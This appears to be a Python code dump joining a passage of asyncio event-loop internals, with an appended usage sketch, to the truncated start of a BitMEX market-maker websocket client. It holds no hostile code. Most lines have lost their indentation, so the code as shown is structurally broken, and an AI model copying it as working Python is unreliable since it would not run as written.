raise ValueError(
'host/port and sock can not be specified at the same time')
infos = await self._ensure_resolved(
(host, port), family=family,
type=socket.SOCK_STREAM, proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
if local_addr is not None:
laddr_infos = await self._ensure_resolved(
local_addr, family=family,
type=socket.SOCK_STREAM, proto=proto,
flags=flags, loop=self)
if not laddr_infos:
raise OSError('getaddrinfo() returned empty list')
else:
laddr_infos = None
if interleave:
infos = _interleave_addrinfos(infos, interleave)
exceptions = []
if happy_eyeballs_delay is None:
# not using happy eyeballs
for addrinfo in infos:
try:
sock = await self._connect_sock(
exceptions, addrinfo, laddr_infos)
break
except OSError:
continue
else: # using happy eyeballs
sock, _, _ = await staggered.staggered_race(
(functools.partial(self._connect_sock,
exceptions, addrinfo, laddr_infos)
for addrinfo in infos),
happy_eyeballs_delay, loop=self)
if sock is None:
exceptions = [exc for sub in exceptions for exc in sub]
if len(exceptions) == 1:
raise exceptions[0]
else:
# If they all have the same str(), raise one.
model = str(exceptions[0])
if all(str(exc) == model for exc in exceptions):
raise exceptions[0]
# Raise a combined exception so the user can see all
# the various error messages.
raise OSError('Multiple exceptions: {}'.format(
', '.join(str(exc) for exc in exceptions)))
else:
if sock is None:
raise ValueError(
                    'host and port were not specified and no sock specified')
if sock.type != socket.SOCK_STREAM:
# We allow AF_INET, AF_INET6, AF_UNIX as long as they
# are SOCK_STREAM.
# We support passing AF_UNIX sockets even though we have
# a dedicated API for that: create_unix_connection.
# Disallowing AF_UNIX in this method, breaks backwards
# compatibility.
raise ValueError(
f'A Stream Socket was expected, got {sock!r}')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r connected to %s:%r: (%r, %r)",
sock, host, port, transport, protocol)
return transport, protocol
async def _create_connection_transport(
self, sock, protocol_factory, ssl,
server_hostname, server_side=False,
ssl_handshake_timeout=None):
sock.setblocking(False)
protocol = protocol_factory()
waiter = self.create_future()
if ssl:
sslcontext = None if isinstance(ssl, bool) else ssl
transport = self._make_ssl_transport(
sock, protocol, sslcontext, waiter,
server_side=server_side, server_hostname=server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
else:
transport = self._make_socket_transport(sock, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def sendfile(self, transport, file, offset=0, count=None,
*, fallback=True):
"""Send a file to transport.
Return the total number of bytes which were sent.
The method uses high-performance os.sendfile if available.
file must be a regular file object opened in binary mode.
        offset tells from where to start reading the file. If specified,
        count is the total number of bytes to transmit, as opposed to
        sending the file until EOF is reached. The file position is updated
        on return, and also in case of error, in which case file.tell()
        can be used to figure out the number of bytes which were sent.
        fallback, when set to True, makes asyncio manually read and send
        the file when the platform does not support the sendfile syscall
        (e.g. Windows or an SSL socket on Unix).
Raise SendfileNotAvailableError if the system does not support
sendfile syscall and fallback is False.
"""
if transport.is_closing():
raise RuntimeError("Transport is closing")
mode = getattr(transport, '_sendfile_compatible',
constants._SendfileMode.UNSUPPORTED)
if mode is constants._SendfileMode.UNSUPPORTED:
raise RuntimeError(
f"sendfile is not supported for transport {transport!r}")
if mode is constants._SendfileMode.TRY_NATIVE:
try:
return await self._sendfile_native(transport, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
if not fallback:
raise RuntimeError(
f"fallback is disabled and native sendfile is not "
f"supported for transport {transport!r}")
return await self._sendfile_fallback(transport, file,
offset, count)
async def _sendfile_native(self, transp, file, offset, count):
raise exceptions.SendfileNotAvailableError(
"sendfile syscall is not supported")
async def _sendfile_fallback(self, transp, file, offset, count):
if offset:
file.seek(offset)
blocksize = min(count, 16384) if count else 16384
buf = bytearray(blocksize)
total_sent = 0
proto = _SendfileFallbackProtocol(transp)
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
return total_sent
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
return total_sent # EOF
await proto.drain()
transp.write(view[:read])
total_sent += read
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
await proto.restore()
async def start_tls(self, transport, protocol, sslcontext, *,
server_side=False,
server_hostname=None,
ssl_handshake_timeout=None):
"""Upgrade transport to TLS.
Return a new transport that *protocol* should start using
immediately.
"""
if ssl is None:
raise RuntimeError('Python ssl module is not available')
if not isinstance(sslcontext, ssl.SSLContext):
raise TypeError(
f'sslcontext is expected to be an instance of ssl.SSLContext, '
f'got {sslcontext!r}')
if not getattr(transport, '_start_tls_compatible', False):
raise TypeError(
f'transport {transport!r} is not supported by start_tls()')
waiter = self.create_future()
ssl_protocol = sslproto.SSLProtocol(
self, protocol, sslcontext, waiter,
server_side, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout,
call_connection_made=False)
# Pause early so that "ssl_protocol.data_received()" doesn't
# have a chance to get called before "ssl_protocol.connection_made()".
transport.pause_reading()
transport.set_protocol(ssl_protocol)
conmade_cb = self.call_soon(ssl_protocol.connection_made, transport)
resume_cb = self.call_soon(transport.resume_reading)
try:
await waiter
except BaseException:
transport.close()
conmade_cb.cancel()
resume_cb.cancel()
raise
return ssl_protocol._app_transport
async def create_datagram_endpoint(self, protocol_factory,
local_addr=None, remote_addr=None, *,
family=0, proto=0, flags=0,
reuse_address=_unset, reuse_port=None,
allow_broadcast=None, sock=None):
"""Create datagram connection."""
if sock is not None:
if sock.type != socket.SOCK_DGRAM:
raise ValueError(
f'A UDP Socket was expected, got {sock!r}')
if (local_addr or remote_addr or
family or proto or flags or
reuse_port or allow_broadcast):
# show the problematic kwargs in exception msg
opts = dict(local_addr=local_addr, remote_addr=remote_addr,
family=family, proto=proto, flags=flags,
reuse_address=reuse_address, reuse_port=reuse_port,
allow_broadcast=allow_broadcast)
problems = ', '.join(f'{k}={v}' for k, v in opts.items() if v)
raise ValueError(
f'socket modifier keyword arguments can not be used '
f'when sock is specified. ({problems})')
sock.setblocking(False)
r_addr = None
else:
if not (local_addr or remote_addr):
if family == 0:
raise ValueError('unexpected address family')
addr_pairs_info = (((family, proto), (None, None)),)
elif hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
for addr in (local_addr, remote_addr):
if addr is not None and not isinstance(addr, str):
raise TypeError('string is expected')
if local_addr and local_addr[0] not in (0, '\x00'):
try:
if stat.S_ISSOCK(os.stat(local_addr).st_mode):
os.remove(local_addr)
except FileNotFoundError:
pass
except OSError as err:
# Directory may have permissions only to create socket.
logger.error('Unable to check or remove stale UNIX '
'socket %r: %r',
local_addr, err)
addr_pairs_info = (((family, proto),
(local_addr, remote_addr)), )
else:
# join address by (family, protocol)
addr_infos = {} # Using order preserving dict
for idx, addr in ((0, local_addr), (1, remote_addr)):
if addr is not None:
assert isinstance(addr, tuple) and len(addr) == 2, (
'2-tuple is expected')
infos = await self._ensure_resolved(
addr, family=family, type=socket.SOCK_DGRAM,
proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
for fam, _, pro, _, address in infos:
key = (fam, pro)
if key not in addr_infos:
addr_infos[key] = [None, None]
addr_infos[key][idx] = address
# each addr has to have info for each (family, proto) pair
addr_pairs_info = [
(key, addr_pair) for key, addr_pair in addr_infos.items()
if not ((local_addr and addr_pair[0] is None) or
(remote_addr and addr_pair[1] is None))]
if not addr_pairs_info:
raise ValueError('can not get address information')
exceptions = []
# bpo-37228
if reuse_address is not _unset:
if reuse_address:
raise ValueError("Passing `reuse_address=True` is no "
"longer supported, as the usage of "
"SO_REUSEPORT in UDP poses a significant "
"security concern.")
else:
warnings.warn("The *reuse_address* parameter has been "
"deprecated as of 3.5.10 and is scheduled "
"for removal in 3.11.", DeprecationWarning,
stacklevel=2)
for ((family, proto),
(local_address, remote_address)) in addr_pairs_info:
sock = None
r_addr = None
try:
sock = socket.socket(
family=family, type=socket.SOCK_DGRAM, proto=proto)
if reuse_port:
_set_reuseport(sock)
if allow_broadcast:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.setblocking(False)
if local_addr:
sock.bind(local_address)
if remote_addr:
if not allow_broadcast:
await self.sock_connect(sock, remote_address)
r_addr = remote_address
except OSError as exc:
if sock is not None:
sock.close()
exceptions.append(exc)
except:
if sock is not None:
sock.close()
raise
else:
break
else:
raise exceptions[0]
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_datagram_transport(
sock, protocol, r_addr, waiter)
if self._debug:
if local_addr:
logger.info("Datagram endpoint local_addr=%r remote_addr=%r "
"created: (%r, %r)",
local_addr, remote_addr, transport, protocol)
else:
logger.debug("Datagram endpoint remote_addr=%r created: "
"(%r, %r)",
remote_addr, transport, protocol)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def _ensure_resolved(self, address, *,
family=0, type=socket.SOCK_STREAM,
proto=0, flags=0, loop):
host, port = address[:2]
info = _ipaddr_info(host, port, family, type, proto, *address[2:])
if info is not None:
# "host" is already a resolved IP.
return [info]
else:
return await loop.getaddrinfo(host, port, family=family, type=type,
proto=proto, flags=flags)
async def _create_server_getaddrinfo(self, host, port, family, flags):
infos = await self._ensure_resolved((host, port), family=family,
type=socket.SOCK_STREAM,
flags=flags, loop=self)
if not infos:
raise OSError(f'getaddrinfo({host!r}) returned empty list')
return infos
async def create_server(
self, protocol_factory, host=None, port=None,
*,
family=socket.AF_UNSPEC,
flags=socket.AI_PASSIVE,
sock=None,
backlog=100,
ssl=None,
reuse_address=None,
reuse_port=None,
ssl_handshake_timeout=None,
start_serving=True):
"""Create a TCP server.
The host parameter can be a string, in that case the TCP server is
bound to host and port.
The host parameter can also be a sequence of strings and in that case
the TCP server is bound to all hosts of the sequence. If a host
appears multiple times (possibly indirectly e.g. when hostnames
resolve to the same IP address), the server is only bound once to that
host.
Return a Server object which can be used to stop the service.
This method is a coroutine.
"""
if isinstance(ssl, bool):
raise TypeError('ssl argument must be an SSLContext or None')
if ssl_handshake_timeout is not None and ssl is None:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
if reuse_address is None:
reuse_address = os.name == 'posix' and sys.platform != 'cygwin'
sockets = []
if host == '':
hosts = [None]
elif (isinstance(host, str) or
not isinstance(host, collections.abc.Iterable)):
hosts = [host]
else:
hosts = host
fs = [self._create_server_getaddrinfo(host, port, family=family,
flags=flags)
for host in hosts]
infos = await tasks.gather(*fs, loop=self)
infos = set(itertools.chain.from_iterable(infos))
completed = False
try:
for res in infos:
af, socktype, proto, canonname, sa = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error:
# Assume it's a bad family/type/protocol combination.
if self._debug:
logger.warning('create_server() failed to create '
'socket.socket(%r, %r, %r)',
af, socktype, proto, exc_info=True)
continue
sockets.append(sock)
if reuse_address:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
if reuse_port:
_set_reuseport(sock)
# Disable IPv4/IPv6 dual stack support (enabled by
# default on Linux) which makes a single socket
# listen on both address families.
if (_HAS_IPv6 and
af == socket.AF_INET6 and
hasattr(socket, 'IPPROTO_IPV6')):
sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_V6ONLY,
True)
try:
sock.bind(sa)
except OSError as err:
raise OSError(err.errno, 'error while attempting '
'to bind on address %r: %s'
% (sa, err.strerror.lower())) from None
completed = True
finally:
if not completed:
for sock in sockets:
sock.close()
else:
if sock is None:
raise ValueError('Neither host/port nor sock were specified')
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
sockets = [sock]
for sock in sockets:
sock.setblocking(False)
server = Server(self, sockets, protocol_factory,
ssl, backlog, ssl_handshake_timeout)
if start_serving:
server._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0, loop=self)
if self._debug:
logger.info("%r is serving", server)
return server
async def connect_accepted_socket(
self, protocol_factory, sock,
*, ssl=None,
ssl_handshake_timeout=None):
"""Handle an accepted connection.
This is used by servers that accept connections outside of
asyncio but that use asyncio to handle connections.
This method is a coroutine. When completed, the coroutine
returns a (transport, protocol) pair.
"""
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, '', server_side=True,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r handled: (%r, %r)", sock, transport, protocol)
return transport, protocol
async def connect_read_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_read_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Read pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
async def connect_write_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_write_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Write pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
def _log_subprocess(self, msg, stdin, stdout, stderr):
info = [msg]
if stdin is not None:
info.append(f'stdin={_format_pipe(stdin)}')
if stdout is not None and stderr == subprocess.STDOUT:
info.append(f'stdout=stderr={_format_pipe(stdout)}')
else:
if stdout is not None:
info.append(f'stdout={_format_pipe(stdout)}')
if stderr is not None:
info.append(f'stderr={_format_pipe(stderr)}')
logger.debug(' '.join(info))
async def subprocess_shell(self, protocol_factory, cmd, *,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=False,
shell=True, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if not isinstance(cmd, (bytes, str)):
raise ValueError("cmd must be a string")
if universal_newlines:
raise ValueError("universal_newlines must be False")
if not shell:
raise ValueError("shell must be True")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = 'run shell command %r' % cmd
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, cmd, True, stdin, stdout, stderr, bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
async def subprocess_exec(self, protocol_factory, program, *args,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=False,
shell=False, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if universal_newlines:
raise ValueError("universal_newlines must be False")
if shell:
raise ValueError("shell must be False")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
popen_args = (program,) + args
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = f'execute program {program!r}'
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, popen_args, False, stdin, stdout, stderr,
bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
def get_exception_handler(self):
"""Return an exception handler, or None if the default one is in use.
"""
return self._exception_handler
def set_exception_handler(self, handler):
"""Set handler as the new event loop exception handler.
If handler is None, the default exception handler will
be set.
If handler is a callable object, it should have a
signature matching '(loop, context)', where 'loop'
will be a reference to the active event loop, 'context'
will be a dict object (see `call_exception_handler()`
documentation for details about context).
"""
if handler is not None and not callable(handler):
raise TypeError(f'A callable object or None is expected, '
f'got {handler!r}')
self._exception_handler = handler
def default_exception_handler(self, context):
"""Default exception handler.
This is called when an exception occurs and no exception
handler is set, and can be called by a custom exception
handler that wants to defer to the default behavior.
This default handler logs the error message and other
context-dependent information. In debug mode, a truncated
stack trace is also appended showing where the given object
(e.g. a handle or future or task) was created, if any.
The context parameter has the same meaning as in
`call_exception_handler()`.
"""
message = context.get('message')
if not message:
message = 'Unhandled exception in event loop'
exception = context.get('exception')
if exception is not None:
exc_info = (type(exception), exception, exception.__traceback__)
else:
exc_info = False
if ('source_traceback' not in context and
self._current_handle is not None and
self._current_handle._source_traceback):
context['handle_traceback'] = \
self._current_handle._source_traceback
log_lines = [message]
for key in sorted(context):
if key in {'message', 'exception'}:
continue
value = context[key]
if key == 'source_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Object created at (most recent call last):\n'
value += tb.rstrip()
elif key == 'handle_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Handle created at (most recent call last):\n'
value += tb.rstrip()
else:
value = repr(value)
log_lines.append(f'{key}: {value}')
logger.error('\n'.join(log_lines), exc_info=exc_info)
def call_exception_handler(self, context):
"""Call the current event loop's exception handler.
The context argument is a dict containing the following keys:
- 'message': Error message;
- 'exception' (optional): Exception object;
- 'future' (optional): Future instance;
- 'task' (optional): Task instance;
- 'handle' (optional): Handle instance;
- 'protocol' (optional): Protocol instance;
- 'transport' (optional): Transport instance;
- 'socket' (optional): Socket instance;
- 'asyncgen' (optional): Asynchronous generator that caused
the exception.
        New keys may be introduced in the future.
Note: do not overload this method in an event loop subclass.
For custom exception handling, use the
`set_exception_handler()` method.
"""
if self._exception_handler is None:
try:
self.default_exception_handler(context)
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
# Second protection layer for unexpected errors
# in the default implementation, as well as for subclassed
# event loops with overloaded "default_exception_handler".
logger.error('Exception in default exception handler',
exc_info=True)
else:
try:
self._exception_handler(self, context)
except (SystemExit, KeyboardInterrupt):
raise
except BaseException as exc:
# Exception in the user set custom exception handler.
try:
# Let's try default handler.
self.default_exception_handler({
'message': 'Unhandled error in exception handler',
'exception': exc,
'context': context,
})
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
# Guard 'default_exception_handler' in case it is
# overloaded.
logger.error('Exception in default exception handler '
'while handling an unexpected error '
'in custom exception handler',
exc_info=True)
def _add_callback(self, handle):
"""Add a Handle to _scheduled (TimerHandle) or _ready."""
assert isinstance(handle, events.Handle), 'A Handle is required here'
if handle._cancelled:
return
assert not isinstance(handle, events.TimerHandle)
self._ready.append(handle)
def _add_callback_signalsafe(self, handle):
"""Like _add_callback() but called from a signal handler."""
self._add_callback(handle)
self._write_to_self()
def _timer_handle_cancelled(self, handle):
"""Notification that a TimerHandle has been cancelled."""
if handle._scheduled:
self._timer_cancelled_count += 1
def _run_once(self):
"""Run one full iteration of the event loop.
This calls all currently ready callbacks, polls for I/O,
schedules the resulting callbacks, and finally schedules
'call_later' callbacks.
"""
sched_count = len(self._scheduled)
if (sched_count > _MIN_SCHEDULED_TIMER_HANDLES and
self._timer_cancelled_count / sched_count >
_MIN_CANCELLED_TIMER_HANDLES_FRACTION):
# Remove delayed calls that were cancelled if their number
# is too high
new_scheduled = []
for handle in self._scheduled:
if handle._cancelled:
handle._scheduled = False
else:
new_scheduled.append(handle)
heapq.heapify(new_scheduled)
self._scheduled = new_scheduled
self._timer_cancelled_count = 0
else:
# Remove delayed calls that were cancelled from head of queue.
while self._scheduled and self._scheduled[0]._cancelled:
self._timer_cancelled_count -= 1
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
timeout = None
if self._ready or self._stopping:
timeout = 0
elif self._scheduled:
# Compute the desired timeout.
when = self._scheduled[0]._when
timeout = min(max(0, when - self.time()), MAXIMUM_SELECT_TIMEOUT)
event_list = self._selector.select(timeout)
self._process_events(event_list)
# Handle 'later' callbacks that are ready.
end_time = self.time() + self._clock_resolution
while self._scheduled:
handle = self._scheduled[0]
if handle._when >= end_time:
break
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
self._ready.append(handle)
# This is the only place where callbacks are actually *called*.
# All other places just add them to ready.
# Note: We run all currently scheduled callbacks, but not any
# callbacks scheduled by callbacks run this time around --
# they will be run the next time (after another I/O poll).
# Use an idiom that is thread-safe without using locks.
ntodo = len(self._ready)
for i in range(ntodo):
handle = self._ready.popleft()
if handle._cancelled:
continue
if self._debug:
try:
self._current_handle = handle
t0 = self.time()
handle._run()
dt = self.time() - t0
if dt >= self.slow_callback_duration:
logger.warning('Executing %s took %.3f seconds',
_format_handle(handle), dt)
finally:
self._current_handle = None
else:
handle._run()
handle = None # Needed to break cycles when an exception occurs.
def _set_coroutine_origin_tracking(self, enabled):
if bool(enabled) == bool(self._coroutine_origin_tracking_enabled):
return
if enabled:
self._coroutine_origin_tracking_saved_depth = (
sys.get_coroutine_origin_tracking_depth())
sys.set_coroutine_origin_tracking_depth(
constants.DEBUG_STACK_DEPTH)
else:
sys.set_coroutine_origin_tracking_depth(
self._coroutine_origin_tracking_saved_depth)
self._coroutine_origin_tracking_enabled = enabled
def get_debug(self):
return self._debug
def set_debug(self, enabled):
self._debug = enabled
if self.is_running():
self.call_soon_threadsafe(self._set_coroutine_origin_tracking, enabled)
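# --- Illustrative usage sketch (not part of asyncio itself) -----------------
# Shows how a caller typically drives the APIs implemented above from user
# code. 'example.com', port 80, '127.0.0.1:9999' and 'payload.bin' are
# placeholder values chosen only for this example.
async def _example_tcp_sendfile():
    import asyncio
    loop = asyncio.get_running_loop()
    # create_connection() resolves the host, tries each address, and returns a
    # (transport, protocol) pair once one connect attempt succeeds.
    transport, _protocol = await loop.create_connection(
        asyncio.Protocol, 'example.com', 80)
    try:
        with open('payload.bin', 'rb') as f:
            # sendfile() prefers the native syscall and, with fallback=True,
            # degrades to the read/sendall loop shown in _sendfile_fallback().
            await loop.sendfile(transport, f)
    finally:
        transport.close()
async def _example_udp_ping():
    import asyncio
    loop = asyncio.get_running_loop()
    # create_datagram_endpoint() with remote_addr yields a "connected" UDP
    # transport, so sendto() needs no explicit destination address.
    transport, _protocol = await loop.create_datagram_endpoint(
        asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 9999))
    transport.sendto(b'ping')
    transport.close()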
|
ws_thread.py
|
import sys
import websocket
import threading
import traceback
import ssl
from time import sleep
import json
import decimal
import logging
from market_maker.settings import settings
from market_maker.auth.APIKeyAuth import generate_expires, generate_signature
from market_maker.utils.log import setup_custom_logger
from market_maker.utils.math import toNearest
from future.utils import iteritems
from future.standard_library import hooks
with hooks(): # Python 2/3 compat
from urllib.parse import urlparse, urlunparse
# Connects to BitMEX websocket for streaming realtime data.
# The Marketmaker still interacts with this as if it were a REST Endpoint, but now it can get
# much more realtime data without heavily polling the API.
#
# The Websocket offers a bunch of data as raw properties right on the object.
# On connect, it synchronously asks for a push of all this data then returns.
# Right after, the MM can start using its data. It will be updated in realtime, so the MM can
# poll as often as it wants.
class BitMEXWebsocket():
# Don't grow a table larger than this amount. Helps cap memory usage.
MAX_TABLE_LEN = 200
def __init__(self):
self.logger = logging.getLogger('root')
self.__reset()
def __del__(self):
self.exit()
def connect(self, endpoint="", symbol="XBTN15", shouldAuth=True):
'''Connect to the websocket and initialize data stores.'''
self.logger.debug("Connecting WebSocket.")
self.symbol = symbol
self.shouldAuth = shouldAuth
# We can subscribe right in the connection querystring, so let's build that.
# Subscribe to all pertinent endpoints
subscriptions = [sub + ':' + symbol for sub in ["quote", "trade"]]
subscriptions += ["instrument"] # We want all of them
if self.shouldAuth:
subscriptions += [sub + ':' + symbol for sub in ["order", "execution"]]
subscriptions += ["margin", "position"]
# Get WS URL and connect.
urlParts = list(urlparse(endpoint))
urlParts[0] = urlParts[0].replace('http', 'ws')
urlParts[2] = "/realtime?subscribe=" + ",".join(subscriptions)
wsURL = urlunparse(urlParts)
self.logger.info("Connecting to %s" % wsURL)
self.__connect(wsURL)
self.logger.info('Connected to WS. Waiting for data images, this may take a moment...')
# Connected. Wait for partials
self.__wait_for_symbol(symbol)
if self.shouldAuth:
self.__wait_for_account()
self.logger.info('Got all market data. Starting.')
#
# Data methods
#
def get_instrument(self, symbol):
instruments = self.data['instrument']
matchingInstruments = [i for i in instruments if i['symbol'] == symbol]
if len(matchingInstruments) == 0:
raise Exception("Unable to find instrument or index with symbol: " + symbol)
instrument = matchingInstruments[0]
# Turn the 'tickSize' into 'tickLog' for use in rounding
# http://stackoverflow.com/a/6190291/832202
instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])).as_tuple().exponent * -1
return instrument
def get_ticker(self, symbol):
'''Return a ticker object. Generated from instrument.'''
instrument = self.get_instrument(symbol)
        # If this is an index, we have to get the data from the mark price.
if instrument['symbol'][0] == '.':
ticker = {}
ticker['mid'] = ticker['buy'] = ticker['sell'] = ticker['last'] = instrument['markPrice']
# Normal instrument
else:
bid = instrument['bidPrice'] or instrument['lastPrice']
ask = instrument['askPrice'] or instrument['lastPrice']
ticker = {
"last": instrument['lastPrice'],
"buy": bid,
"sell": ask,
"mid": (bid + ask) / 2
}
# The instrument has a tickSize. Use it to round values.
return {k: toNearest(float(v or 0), instrument['tickSize']) for k, v in iteritems(ticker)}
def funds(self):
return self.data['margin'][0]
def market_depth(self, symbol):
raise NotImplementedError('orderBook is not subscribed; use askPrice and bidPrice on instrument')
# return self.data['orderBook25'][0]
def open_orders(self, clOrdIDPrefix):
orders = self.data['order']
# Filter to only open orders (leavesQty > 0) and those that we actually placed
return [o for o in orders if str(o['clOrdID']).startswith(clOrdIDPrefix) and o['leavesQty'] > 0]
def position(self, symbol):
positions = self.data['position']
pos = [p for p in positions if p['symbol'] == symbol]
if len(pos) == 0:
# No position found; stub it
return {'avgCostPrice': 0, 'avgEntryPrice': 0, 'currentQty': 0, 'symbol': symbol}
return pos[0]
def recent_trades(self):
return self.data['trade']
#
# Lifecycle methods
#
def error(self, err):
self._error = err
self.logger.error(err)
self.exit()
def exit(self):
self.exited = True
self.ws.close()
#
# Private methods
#
def __connect(self, wsURL):
'''Connect to the websocket in a thread.'''
self.logger.debug("Starting thread")
ssl_defaults = ssl.get_default_verify_paths()
sslopt_ca_certs = {'ca_certs': ssl_defaults.cafile}
self.ws = websocket.WebSocketApp(wsURL,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error,
header=self.__get_auth()
)
setup_custom_logger('websocket', log_level=settings.LOG_LEVEL)
self.wst = threading.Thread(target=lambda: self.ws.run_forever(sslopt=sslopt_ca_certs))
self.wst.daemon = True
self.wst.start()
self.logger.info("Started thread")
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout and not self._error:
sleep(1)
conn_timeout -= 1
if not conn_timeout or self._error:
self.logger.error("Couldn't connect to WS! Exiting.")
self.exit()
sys.exit(1)
def __get_auth(self):
'''Return auth headers. Will use API Keys if present in settings.'''
if self.shouldAuth is False:
return []
self.logger.info("Authenticating with API Key.")
# To auth to the WS using an API key, we generate a signature of a nonce and
# the WS API endpoint.
nonce = generate_expires()
return [
"api-expires: " + str(nonce),
"api-signature: " + generate_signature(settings.API_SECRET, 'GET', '/realtime', nonce, ''),
"api-key:" + settings.API_KEY
]
def __wait_for_account(self):
'''On subscribe, this data will come down. Wait for it.'''
# Wait for the keys to show up from the ws
while not {'margin', 'position', 'order'} <= set(self.data):
sleep(0.1)
def __wait_for_symbol(self, symbol):
'''On subscribe, this data will come down. Wait for it.'''
while not {'instrument', 'trade', 'quote'} <= set(self.data):
sleep(0.1)
def __send_command(self, command, args):
'''Send a raw command.'''
self.ws.send(json.dumps({"op": command, "args": args or []}))
def __on_message(self, message):
'''Handler for parsing WS messages.'''
message = json.loads(message)
self.logger.debug(json.dumps(message))
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
try:
if 'subscribe' in message:
if message['success']:
self.logger.debug("Subscribed to %s." % message['subscribe'])
else:
self.error("Unable to subscribe to %s. Error: \"%s\" Please check and restart." %
(message['request']['args'][0], message['error']))
elif 'status' in message:
if message['status'] == 400:
self.error(message['error'])
if message['status'] == 401:
self.error("API Key incorrect, please check and restart.")
elif action:
if table not in self.data:
self.data[table] = []
if table not in self.keys:
self.keys[table] = []
# There are four possible actions from the WS:
# 'partial' - full table image
# 'insert' - new row
# 'update' - update row
# 'delete' - delete row
if action == 'partial':
self.logger.debug("%s: partial" % table)
self.data[table] += message['data']
# Keys are communicated on partials to let you know how to uniquely identify
# an item. We use it for updates.
self.keys[table] = message['keys']
elif action == 'insert':
self.logger.debug('%s: inserting %s' % (table, message['data']))
self.data[table] += message['data']
# Limit the max length of the table to avoid excessive memory usage.
# Don't trim orders because we'll lose valuable state if we do.
if table not in ['order', 'orderBookL2'] and len(self.data[table]) > BitMEXWebsocket.MAX_TABLE_LEN:
self.data[table] = self.data[table][(BitMEXWebsocket.MAX_TABLE_LEN // 2):]
elif action == 'update':
self.logger.debug('%s: updating %s' % (table, message['data']))
# Locate the item in the collection and update it.
for updateData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], updateData)
if not item:
continue # No item found to update. Could happen before push
# Log executions
if table == 'order':
is_canceled = 'ordStatus' in updateData and updateData['ordStatus'] == 'Canceled'
if 'cumQty' in updateData and not is_canceled:
contExecuted = updateData['cumQty'] - item['cumQty']
if contExecuted > 0:
instrument = self.get_instrument(item['symbol'])
self.logger.info("Execution: %s %d Contracts of %s at %.*f" %
(item['side'], contExecuted, item['symbol'],
instrument['tickLog'], item['price']))
# Update this item.
